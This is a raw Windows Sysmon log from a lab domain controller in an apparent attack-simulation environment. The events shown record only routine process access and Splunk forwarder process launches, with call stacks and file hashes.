15:51:28.237{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002364Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.237{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002363Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.237{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002362Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.237{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002361Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.237{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002360Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.237{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002359Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.237{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002358Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.237{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002357Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.237{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C80-5FA1-7000-000000008801}4356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002356Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.237{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C80-5FA1-7000-000000008801}4356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002355Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.057{D28789B6-7C80-5FA1-7000-000000008801}4356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002413Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.956{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C81-5FA1-7300-000000008801}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002412Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.956{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002411Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.956{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002410Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.956{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002409Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.956{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002408Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.956{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002407Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.956{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002406Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.956{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002405Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.956{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002404Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.956{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002403Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.956{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C81-5FA1-7300-000000008801}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002402Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.956{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C81-5FA1-7300-000000008801}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002401Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.774{D28789B6-7C81-5FA1-7300-000000008801}4672C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002400Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.253{D28789B6-7C80-5FA1-7200-000000008801}45244528C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002399Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.097{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C80-5FA1-7200-000000008801}4524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002398Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\